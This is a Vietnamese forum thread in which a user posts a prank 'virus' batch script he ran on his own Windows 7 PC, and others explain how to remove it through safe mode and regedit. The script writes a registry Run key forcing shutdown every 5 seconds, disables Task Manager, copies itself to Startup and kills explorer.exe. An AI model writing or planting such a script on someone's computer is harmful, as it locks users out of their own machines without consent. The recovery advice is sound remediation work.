Virus notepad tự shut down máy

Hien_Le2 · December 20, 2019, 1:18pm

Ai chỉ em với em thấy trên mạng có cái trò virus tắt máy tính sau 5s hoặc nếu nhấp vào cái gì cũng bị tắt máy . em tạo xong lỡ dại nhấp vào . k lquan nhưng ai giúp em với .
Code ạ

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v shutdown /t REG_SZ /d "shutdown.exe -f -s -t 05" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
cls
copy thelove.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\"
cls
taskkill /f /im explorer.exe
cls
@echo off
echo Warning!!!!!!!!May Tinh Cua Ban Da Bi Nhiem Virus Nguy Hiem !!!!!!!!!
echo GOOD BYE SEE YOU AGAIN
pause
del Mr.Boss.bat

Duong_Act · December 20, 2019, 2:06pm

Vào safe mode xoá những cái nó ghi vào registry và startup. Đấy là window xp và windows 7.

Win10 thì cũng tìm cách vào được safe mode nhưng chắc khó vì win10 cần nhiều thao tác. Nếu đã vào được thì làm như cách safe mode bên trên.

Nếu nhanh tay bật run bằng cách nhấn cửa sổ + R và gõ lệnh shutdown -a vào cmd.

Nếu vẫn không nhanh thì khi vừa khởi động ngay lập tức log off (window + L). Sau đó bật taskmanager để khởi động lại explorer. Rồi sau đó xoá những thứ nó đã tạo ra.

Nếu không nhanh thì boot từ một thiết bị khác như usb, os khác để xoá các key, file, đánh tráo cmd.exe.

Hien_Le2 · December 20, 2019, 2:09pm

Dạ . em cũng thử cách nhập shutdown -a rồi nhưng k đc với lại có thể nào chỉ em cách vào chế độ safe mode k ạ . Em tạo nó lúc đầu là txt nhưng đổi thành đuôi .bat ạ

Hien_Le2 · December 20, 2019, 2:11pm

E sài win 7 ạ . mong được giúp

Reborn · December 20, 2019, 2:14pm

Keyword: enter safe mode on windows 7

Duong_Act · December 20, 2019, 2:26pm

Win7 thì sau khi máy bắt đầu khởi động qua bios thì ấn liên tục F8 sẽ vào chế độ chọn safe mode.

Hien_Le2 · December 20, 2019, 2:26pm

Em thấy trên google nó chỉ cách giữ ạ

Duong_Act · December 20, 2019, 2:28pm

Giữ cũng được, như nhau mà.

Hien_Le2 · December 20, 2019, 2:29pm

Ok em vào r h vào đâu nữa ạ

Duong_Act · December 20, 2019, 2:34pm

Xem cái file bat nó ghi nó copy những cái gì vào đâu thì vào đó xoá đi thôi.
Nó ghi 2 key vào registry thì vào registry theo đường dẫn nó ghi trong file mà xoá key đó. Vào registry bằng cách gõ regedit vào cửa sổ run.
Nó copy 1 file bat vào startup thì cũng vào đường dẫn đó xoá.

Hien_Le2 · December 20, 2019, 2:49pm

Nó ghi copy vào đường dẫn đó . nhưng tới lúc em vào thì đó là thư mục rỗng . Em nghĩ là nó ghi vậy thôi chứ không làm gì đâu , em c mơn a nhìu ạ

SITUVN.gcd · December 20, 2019, 3:00pm

Vì bạn chỉ chép mã mà, mấy tập tin kia (thelove.bat và Mr.Boss.bat) bạn đâu có tải về, đúng không?
Giờ thì chỉ cần xóa 2 khóa trong regedit thôi.

Tinn · April 18, 2021, 5:06pm

A ơi e dùng win 10 làm sao để tắt virus tắtmay 5s ạ

library · May 19, 2022, 12:55pm

A post was merged into an existing topic: Topic lưu trữ các post off-topic - version 3